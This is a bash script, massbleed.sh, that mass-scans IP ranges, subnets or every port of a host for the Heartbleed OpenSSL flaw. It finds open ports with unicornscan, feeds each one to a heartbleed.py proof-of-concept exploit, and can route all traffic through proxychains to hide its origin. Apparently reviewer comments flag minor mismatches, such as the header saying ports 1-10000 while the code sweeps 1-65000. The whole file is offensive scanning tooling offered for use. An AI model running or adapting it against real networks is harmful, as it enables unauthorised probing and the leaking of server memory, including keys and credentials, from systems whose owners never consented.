`#!/bin/bash
# massbleed.sh 20140423 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individually scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to run the scan through proxychains. You'll need to configure /etc/proxychains.conf for this to work.
# USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# Prerequisites:
# Is the heartbleed POC present?
# Is unicornscan installed?
# Is nmap installed?
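# Banner.
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== massbleed.sh 20140423 by 1N3"
echo ""

# Prerequisite probes. Each variable stays empty when its dependency is
# missing; the checks that follow compare against these exact values.
#
# heartbleed.py is looked up in the current working directory (not next to
# this script), and that same relative path is what later gets handed to
# python. Run the script from a directory whose contents you control.
# A plain file test replaces parsing `ls`, which writes an error to stderr
# when the file is absent and lists the contents when the name is a directory.
if [ -f heartbleed.py ]; then
  HEARTBLEED="heartbleed.py"
else
  HEARTBLEED=""
fi

# `command -v` is the POSIX way to resolve a command; it prints nothing when
# the tool is not on PATH, which is what the later empty-string checks expect.
UNICORNSCAN=$(command -v unicornscan)
NMAP=$(command -v nmap)

# Positional arguments (see the usage line in the header):
RANGE=$1        # target: CIDR, single IP, or "a.b.c." prefix for subnet mode
ALL_PORTS=$2    # mode selector: single | port | subnet (anything else: 443 sweep)
CUSTOM_PORT=$3  # port number for "port" mode; "0" is used as a placeholder
PROXY=$4        # literal "proxy" routes every scanner call through proxychains

# Port range swept in "single" mode.
# NOTE(review): the header comment describes this sweep as ports 1-10000, but
# the value actually used is 1-65000.
PORT_RANGE="1-65000"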
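# Pre-flight checks. Every failure path writes to stderr and exits non-zero,
# so a wrapper script or CI job can tell "nothing was scanned" apart from a
# completed run (a bare `exit` after `echo` reports success).
# String comparisons use `=`, the POSIX operator; `==` inside `[ ]` is not
# guaranteed to work when the script is started as `sh massbleed.sh`.

# Arguments are checked first so that a bare invocation prints the usage line
# regardless of which tools are installed.
if [ -z "$1" ]; then
  echo "(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]" >&2
  exit 1
fi

# The target is passed on the command line of unicornscan and python; a value
# starting with '-' would be parsed by those tools as an option, not a target.
case "$RANGE" in
  -*)
    echo "(--==== invalid target: $RANGE" >&2
    exit 1
    ;;
esac

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
  echo "(--==== heartbleed.py not found!" >&2
  echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py" >&2
  exit 1
fi

if [ -z "$UNICORNSCAN" ]; then
  echo "(--==== unicornscan not installed! Exiting..." >&2
  exit 1
fi

# NOTE(review): nmap is required here although no later line of this script
# invokes it.
if [ -z "$NMAP" ]; then
  echo "(--==== nmap not installed! Exiting..." >&2
  exit 1
fi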
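# Scan dispatch: run exactly one scan mode, chosen by the second argument.
#
# The mode is selected with a single `case`, so the default 443 sweep runs
# only when no recognised mode was given. With separate `if` blocks, the
# `else` arm of the "port" test also fired after "single" and "subnet" and
# started a second, unrequested scan of $RANGE.
#
# Only POSIX sh constructs are used, so the documented `sh massbleed.sh ...`
# invocation behaves the same as running the script through bash (brace
# expansion such as {1..254} is not part of POSIX sh).

# Run a command directly, or through proxychains when the fourth argument is
# the literal word "proxy".
run_scan() {
  if [ "$PROXY" = "proxy" ]; then
    proxychains "$@"
  else
    "$@"
  fi
}

# Succeed only if $1 is a decimal TCP port number between 1 and 65535.
is_port() {
  case "$1" in
    '' | *[!0-9]*) return 1 ;;
  esac
  [ "${#1}" -le 5 ] && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Abort with a non-zero status when $1 is not a usable port number, so that
# arbitrary text never reaches the scanner command lines as a "-p" value.
require_port() {
  if ! is_port "$1"; then
    echo "(--==== invalid port: $1" >&2
    exit 1
  fi
}

# Run heartbleed.py against host $1, port $2 and print only the output lines
# that contain "Server". Only stdout is filtered; anything heartbleed.py
# writes to stderr still reaches the terminal.
check_heartbleed() {
  run_scan python heartbleed.py "$1" -p "$2" | grep Server
}

# Print the ports unicornscan reports for the given arguments, one per line.
# Depends on unicornscan's line layout: field 4, cut at the first ']'.
list_open_ports() {
  run_scan unicornscan "$@" | awk '{print $4}' | cut -d']' -f1
}

# Print the hosts unicornscan reports for the given arguments (field 6 of
# each output line).
list_hosts() {
  run_scan unicornscan "$@" | awk '{print $6}'
}

if [ "$PROXY" = "proxy" ]; then
  echo "(--==== scanning via proxy..."
fi

# The loops below rely on word splitting of scanner output. Pathname
# expansion is switched off so a stray '*' or '?' in that output is never
# expanded against the current directory.
set -f

case "$ALL_PORTS" in
  single)
    # NOTE(review): only the proxied path honours a specific port in single
    # mode; the direct path always sweeps PORT_RANGE. Kept as found - confirm
    # whether the difference is intentional. "0" and empty both mean "no port".
    if [ "$PROXY" = "proxy" ] && [ -n "$CUSTOM_PORT" ] && [ "$CUSTOM_PORT" != "0" ]; then
      require_port "$CUSTOM_PORT"
      echo "(--==== Checking $RANGE:$CUSTOM_PORT"
      check_heartbleed "$RANGE" "$CUSTOM_PORT"
    else
      for port in $(list_open_ports "$RANGE" -p "$PORT_RANGE"); do
        echo "(--==== Checking $RANGE:$port"
        check_heartbleed "$RANGE" "$port"
      done
    fi
    ;;

  subnet)
    # RANGE is a three-octet prefix with trailing dot (e.g. "192.168.0.");
    # the last octet runs from 1 to 254.
    octet=1
    while [ "$octet" -le 254 ]; do
      host="$RANGE$octet"
      echo "Scanning: $host"
      for port in $(list_open_ports "$host" -mT -r500); do
        echo "$host:$port"
        check_heartbleed "$host" "$port"
      done
      octet=$((octet + 1))
    done
    ;;

  port)
    require_port "$CUSTOM_PORT"
    for host in $(list_hosts "$RANGE" -p "$CUSTOM_PORT"); do
      echo "(--==== Checking: $host:$CUSTOM_PORT"
      check_heartbleed "$host" "$CUSTOM_PORT"
    done
    ;;

  *)
    # No recognised mode (including the "0" placeholder from the usage
    # examples): check 443/tcp across the whole range.
    for host in $(list_hosts "$RANGE" -p 443); do
      echo "(--==== Checking: $host"
      check_heartbleed "$host" 443
    done
    ;;
esac

echo "(--==== scan complete!"
exit 0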
`